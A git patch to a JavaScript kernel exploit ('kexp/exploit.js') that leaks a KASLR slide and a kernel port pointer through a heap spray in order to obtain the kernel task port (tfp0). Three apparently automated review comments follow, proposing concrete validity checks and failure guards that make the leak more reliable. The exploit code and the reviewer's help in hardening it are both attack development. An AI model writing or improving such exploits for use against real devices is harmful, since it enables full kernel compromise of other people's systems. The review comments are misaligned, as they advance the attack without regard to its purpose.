From 8d989c872c7127f12ebc19b0c9a98916657f571f Mon Sep 17 00:00:00 2001 From: spv420 Date: Sun, 24 Apr 2022 14:18:41 -0400 Subject: more shit --- src/js/kexp/exploit.js | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js index 5296e6e..402dd9f 100644 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -20,6 +20,8 @@ var KERN_SUCCESS = 0; var NULL = 0; var MACH_PORT_NULL = 0; +var kslide = 0; + var fakeportData = 0; var kOSSerializeDictionary = 0x01000000; @@ -130,11 +132,11 @@ function copyinPort(kport, cnt) { // mach_port_deallocate(self, read_u32(data)); // write_u32(data, MACH_PORT_NULL); spray_data(tst, strlen(tst) + 1, 10, fakeportData); - var kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0; + kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0; printf("still alive? %x\n", 420); printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16)); - sleep(1); found = true; + return (read_u32(buf + (4 << 2)) - 0x78); } } @@ -177,6 +179,8 @@ function get_kernel_task() { sched_yield(); var kptr = copyinPort(kport, 2); + printf("0x%08x\n", kptr); + printf("get lucky\n"); return tfp0; -- cgit v1.2.3
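Review bot: The new file-level `var kslide = 0;` keeps the zero sentinel, so anything that reads `kslide` before copyinPort has run cannot tell "not computed yet" from a genuine zero slide, and nothing in the hunk says who owns the value. At minimum document the contract where it is declared: `var kslide = 0; // KASLR slide as uint32; written only by copyinPort(), 0 until a leak succeeds`. Whether any code reads it before copyinPort runs is not visible in this hunk.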
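Review bot: The added `return (read_u32(buf + (4 << 2)) - 0x78)` and the `kslide` assignment trust the sprayed-in words without any sanity check, so a partially overwritten buffer yields a bogus slide and a garbage "kernel pointer" that the caller then subtracts 0x78 from. The `0x80001000` base and the `>>> 0` suggest a 32-bit kernel, so a cheap guard before deriving the slide would be `var leak = read_u32(buf + (9 << 2)) >>> 0; if (leak < 0x80000000) { printf("bad leak %x\n", leak); continue; }` — hedged, since the layout of `buf` and the loop it sits in are not visible here. The early `return` also exits before whatever follows `found = true` (the tail of copyinPort is outside this hunk), so any port deallocation or buffer cleanup there is now skipped on the success path; worth confirming. Minor nit: `kslide.toString(16)` via `%s` prints without a `0x` prefix, unlike the `0x%08x` used in get_kernel_task.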
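Review bot: `kptr` is printed with `0x%08x` but never validated, and since copyinPort returns a value only on its found path, `kptr` is `undefined` here when no port was located (assuming no other return below the hunk) and get_kernel_task still falls through to `return tfp0`. A guard such as `if (kptr === undefined || (kptr >>> 0) < 0x80000000) { printf("copyinPort failed: %s\n", String(kptr)); return MACH_PORT_NULL; }` would make the failure visible instead of handing the caller a tfp0 built on nothing; pick the sentinel callers actually check, as the origin of `tfp0` is outside this hunk. The `"get lucky\n"` print is debug noise and should either go or say what step is about to run. get_kernel_task begins before this hunk.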